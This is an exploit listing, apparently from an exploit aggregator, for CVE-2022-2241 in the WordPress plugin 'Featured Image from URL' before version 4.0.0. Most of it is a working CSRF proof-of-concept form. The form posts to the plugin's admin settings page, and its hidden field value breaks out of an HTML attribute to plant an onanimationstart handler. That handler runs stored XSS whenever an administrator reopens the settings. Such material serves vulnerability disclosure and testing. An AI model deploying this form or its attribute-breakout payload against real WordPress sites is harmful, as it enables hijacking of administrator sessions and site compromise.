Exploit for Featured Image from URL < 4.0.0 - Arbitrary Settings Update to Stored XSS via CSRF CVE-2022-2241

Name: Exploit for Featured Image from URL < 4.0.0 - Arbitrary Settings Update to Stored XSS via CSRF CVE-2022-2241
Rating: 5 (150 reviews)

2022-07-11 | CVSS 0.8

## https://sploitus.com/exploit?id=WPEX-ID:8670D196-972B-491B-8D9B-25994A345F57
<form action="https://example.com/wp-admin/admin.php?page=featured-image-from-url" method="POST">
    <input type="hidden" name="fifu_input_photon" value='on" style=animation-name:rotation onanimationstart=alert(/XSS/)//'/>
    
    <input type="submit" value="Submit request" />
</form>

All settings appear to be affected.

The XSS will be triggered when accessing the settings again